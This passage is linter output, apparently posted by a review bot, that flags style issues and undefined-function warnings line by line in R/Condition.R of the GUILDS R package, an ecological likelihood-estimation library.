\n^\n```\n[R/Condition.R:62:18:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L62) *style:* **Variable and function names should be all lowercase.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                 ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:62:54:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L62) *style:* **Trailing whitespace is superfluous.**\n```r\n​    return( -1 * evaluateCondLik(x, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:66:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L66) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:69:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L69) *style:* **Use <-, not =, for assignment.**\n```r\n​ ymax = -1 * maxes$fmin\n      ^\n```\n[R/Condition.R:70:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L70) *style:* **Use <-, not =, for assignment.**\n```r\n​ xmax = maxes$xmin\n      ^\n```\n[R/Condition.R:71:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L71) *style:* **Use <-, not =, for assignment.**\n```r\n​ xlft = 0\n      ^\n```\n[R/Condition.R:72:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L72) *style:* **Use <-, not =, for assignment.**\n```r\n​ xrgt = 1\n      ^\n```\n[R/Condition.R:73:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L73) *style:* **Use <-, not =, for assignment.**\n```r\n​ eps = .Machine$double.eps\n     ^\n```\n[R/Condition.R:75:2:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n ^~~~~~~~~~\n```\n[R/Condition.R:75:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L75) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n             ^\n```\n[R/Condition.R:75:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L75) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:75:54:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L75) *style:* **Trailing whitespace is superfluous.**\n```r\n​ checkLeftX  = evaluateCondLik(eps, theta_x, theta_y, \n                                                     ^\n```\n[R/Condition.R:77:2:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n ^~~~~~~~~~~\n```\n[R/Condition.R:77:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L77) *style:* **Use <-, not =, for assignment.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n             ^\n```\n[R/Condition.R:77:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L77) *style:* **Variable and function names should be all lowercase.**\n```r\n​ checkRightX = evaluateCondLik(1 - eps, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:80:4:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L80) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkLeftX < 0) {\n   ^\n```\n[R/Condition.R:80:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L80) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkLeftX < 0) {\n    ^~~~~~~~~~\n```\n[R/Condition.R:82:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L82) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:82:52:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L82) *style:* **Trailing whitespace is superfluous.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y, \n                                                   ^\n```\n[R/Condition.R:85:32:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L85) *style:* **Commas should always have a space after.**\n```r\n​     xlft <- (uniroot(g, c(eps,xmax)))$root\n                               ^\n```\n[R/Condition.R:88:4:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L88) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​ if(checkRightX < 0) {\n   ^\n```\n[R/Condition.R:88:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L88) *style:* **Variable and function names should be all lowercase.**\n```r\n​ if(checkRightX < 0) {\n    ^~~~~~~~~~~\n```\n[R/Condition.R:90:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L90) *style:* **Variable and function names should be all lowercase.**\n```r\n​        return(evaluateCondLik(x, theta_x, theta_y,\n               ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:94:26:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L94) *style:* **Commas should always have a space after.**\n```r\n​     xrgt <- (uniroot( h,c( xmax, 1 - eps)))$root\n                         ^\n```\n[R/Condition.R:97:2:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L97) *style:* **Variable and function names should be all lowercase.**\n```r\n​ calcLLEXP <- function(x) {\n ^~~~~~~~~\n```\n[R/Condition.R:98:15:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L98) *style:* **Variable and function names should be all lowercase.**\n```r\n​   out <- exp(evaluateCondLik(x, theta_x, theta_y,\n              ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:104:24:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L104) *style:* **Variable and function names should be all lowercase.**\n```r\n​  aux <- integrate(f = calcLLEXP,\n                       ^~~~~~~~~\n```\n[R/Condition.R:111:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L111) *style:* **Trailing whitespace is superfluous.**\n```r\n​  return(LL);  \n             ^~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L115) *style:* **Variable and function names should be all lowercase.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L115) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:115:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L115) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​logLikelihood.Guilds.Conditional <- function(parameters, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:118:3:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L118) *warning:* **local variable ‘Sx’ assigned but may not be used**\n```r\n​  Sx = length(SADX)\n  ^~\n```\n[R/Condition.R:118:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L118) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:119:3:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L119) *warning:* **local variable ‘Sy’ assigned but may not be used**\n```r\n​  Sy = length(SADY)\n  ^~\n```\n[R/Condition.R:119:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L119) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:120:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L120) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:121:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L121) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:122:3:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L122) *warning:* **local variable ‘J’ assigned but may not be used**\n```r\n​  J = Nx + Ny\n  ^\n```\n[R/Condition.R:122:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L122) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:123:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L123) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:126:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L126) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(verbose == TRUE) {\n    ^\n```\n[R/Condition.R:128:55:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L128) *style:* **Trailing whitespace is superfluous.**\n```r\n​   cat(\"Now starting to calculate likelihood of: \\n\"); \n                                                      ^\n```\n[R/Condition.R:130:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L130) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:130:45:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L130) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D0\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:131:50:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L131) *style:* **Trailing whitespace is superfluous.**\n```r\n​                         \" Theta Y =\", \"Theta X\", \n                                                 ^\n```\n[R/Condition.R:133:50:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L133) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                ~^\n```\n[R/Condition.R:133:51:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L133) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", \"Alpha X\" ,\"\\n\")\n                                                  ^\n```\n[R/Condition.R:134:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L134) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n     ^\n```\n[R/Condition.R:134:45:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L134) *style:* **Trailing whitespace is superfluous.**\n```r\n​   if(model == \"D1\") cat(\"Theta X =\", x2[1], \n                                            ^\n```\n[R/Condition.R:137:49:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L137) *style:* **Commas should never have a space before.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                            ~~~~^\n```\n[R/Condition.R:137:50:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L137) *style:* **Commas should always have a space after.**\n```r\n​                         \" Alpha Y =\", x2[3]    ,\"\\n\");\n                                                 ^\n```\n[R/Condition.R:141:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L141) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L142) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:142:9:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L142) *warning:* **no visible global function definition for ‘logLikelihood.Guilds’**\n```r\n​  LL <- logLikelihood.Guilds(parameters, model, SADX, SADY, verbose)\n        ^~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:143:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L143) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L145) *style:* **Variable and function names should be all lowercase.**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:145:23:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L145) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  conditional_part <- calcConditional(parameters, model, Nx, Ny)\n                      ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:146:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L146) *style:* **Trailing whitespace is superfluous.**\n```r\n​   \n^~~\n```\n[R/Condition.R:151:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L151) *style:* **Variable and function names should be all lowercase.**\n```r\n​conditional.LogLik <- function(v, model, J, Sx, Sy, Nx, Ny, KDA_X, KDA_Y,\n^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:152:72:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L152) *style:* **Opening curly braces should never go on their own line and should always be followed by a new line.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                       ^\n```\n[R/Condition.R:152:73:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L152) *style:* **Trailing whitespace is superfluous.**\n```r\n​                               prefactor1, prefactor2, verbose = TRUE) {  \n                                                                        ^~\n```\n[R/Condition.R:153:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L153) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:158:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L158) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:159:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L159) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(model == \"D1\") {\n    ^\n```\n[R/Condition.R:162:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L162) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:163:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L163) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(alpha_x < 0 ||\n    ^\n```\n[R/Condition.R:167:18:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L167) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                ~^~\n```\n[R/Condition.R:167:19:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L167) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_x > (1-(1e-8)) ||\n                  ^\n```\n[R/Condition.R:168:13:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n           ~^~\n```\n[R/Condition.R:168:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n             ^\n```\n[R/Condition.R:168:16:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L168) *style:* **Put spaces around all infix operators.**\n```r\n​     alpha_y>(1-(1e-8))\n              ~^~\n```\n[R/Condition.R:168:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L168) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​     alpha_y>(1-(1e-8))\n                ^\n```\n[R/Condition.R:170:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L170) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:171:9:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L171) *style:* **Variable and function names should be all lowercase.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n        ^~~~~~~~~~~~\n```\n[R/Condition.R:171:60:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L171) *style:* **Trailing whitespace is superfluous.**\n```r\n​  LL <- logLikguilds(theta_x, theta_y, alpha_x, alpha_y, J, \n                                                           ^\n```\n[R/Condition.R:174:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L174) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L175) *style:* **Variable and function names should be all lowercase.**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:175:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L175) *warning:* **no visible global function definition for ‘calcConditional’**\n```r\n​  cond_LL <- calcConditional(v, model, Nx, Ny)\n             ^~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L180) *style:* **Words within variable and function names should be separated by '_' rather than '.'.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L180) *style:* **Variable and function names should not be longer than 30 characters.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:180:46:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L180) *style:* **Variable and function names should be all lowercase.**\n```r\n​maxLikelihood.Guilds.Conditional <- function(initVals, model,\n                                             ^~~~~~~~\n```\n[R/Condition.R:181:53:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L181) *style:* **Trailing whitespace is superfluous.**\n```r\n​                                             method, \n                                                    ^\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L184) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:184:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L184) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_X <- calcKDA(SADX)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L185) *style:* **Variable and function names should be all lowercase.**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:185:12:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L185) *warning:* **no visible global function definition for ‘calcKDA’**\n```r\n​  KDA_Y <- calcKDA(SADY)\n           ^~~~~~~\n```\n[R/Condition.R:186:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L186) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:189:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L189) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x)) freq_x[i] <- x[[i]]\n     ^\n```\n[R/Condition.R:190:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L190) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:191:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L191) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n             ^\n```\n[R/Condition.R:191:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L191) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor1 = -( sum(log(SADX)) + sum(lgamma(1 + freq_x)) )\n                ^\n```\n[R/Condition.R:192:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L192) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:195:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L195) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  for(i in 1:length(x2)) freq_y[i] <- x2[[i]]\n     ^\n```\n[R/Condition.R:196:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L196) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:197:14:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L197) *style:* **Use <-, not =, for assignment.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n             ^\n```\n[R/Condition.R:197:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L197) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  prefactor2 = -( sum(log(SADY)) + sum(lgamma(1 + freq_y)) )\n                ^\n```\n[R/Condition.R:199:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L199) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sx = length(SADX)\n     ^\n```\n[R/Condition.R:200:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L200) *style:* **Use <-, not =, for assignment.**\n```r\n​  Sy = length(SADY)\n     ^\n```\n[R/Condition.R:201:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L201) *style:* **Use <-, not =, for assignment.**\n```r\n​  Nx = sum(SADX)\n     ^\n```\n[R/Condition.R:202:6:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L202) *style:* **Use <-, not =, for assignment.**\n```r\n​  Ny = sum(SADY)\n     ^\n```\n[R/Condition.R:203:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L203) *style:* **Use <-, not =, for assignment.**\n```r\n​  J = Nx + Ny\n    ^\n```\n[R/Condition.R:206:17:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L206) *style:* **Variable and function names should be all lowercase.**\n```r\n​    out <- -1 * conditional.LogLik(x, model, J, Sx, Sy, Nx, Ny,\n                ^~~~~~~~~~~~~~~~~~\n```\n[R/Condition.R:211:1:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L211) *style:* **Trailing whitespace is superfluous.**\n```r\n​  \n^~\n```\n[R/Condition.R:213:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L213) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"simplex\") {\n    ^\n```\n[R/Condition.R:214:10:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L214) *warning:* **no visible global function definition for ‘simplex’, Did you mean 'complex'?**\n```r\n​    x <- simplex(initVals, g, verbose)\n         ^~~~~~~\n```\n[R/Condition.R:214:18:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L214) *style:* **Variable and function names should be all lowercase.**\n```r\n​    x <- simplex(initVals, g, verbose)\n                 ^~~~~~~~\n```\n[R/Condition.R:215:4:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L215) *style:* **Trailing whitespace is superfluous.**\n```r\n​  } \n   ^\n```\n[R/Condition.R:216:5:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L216) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​  if(method == \"subplex\") {\n    ^\n```\n[R/Condition.R:217:7:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L217) *warning:* **no visible global function definition for ‘subplex’**\n```r\n​\tx <- subplex(initVals, g)\n      ^~~~~~~\n```\n[R/Condition.R:217:11:](https://github.com/thijsjanzen/GUILDS/blob/0de889850870bc2ed9de0b63fd4310680edaea02/R/Condition.R#L217) *style:* **Put spaces around all infix operators.**\n```r\n​\tx <- subplex(initVals, g)\n         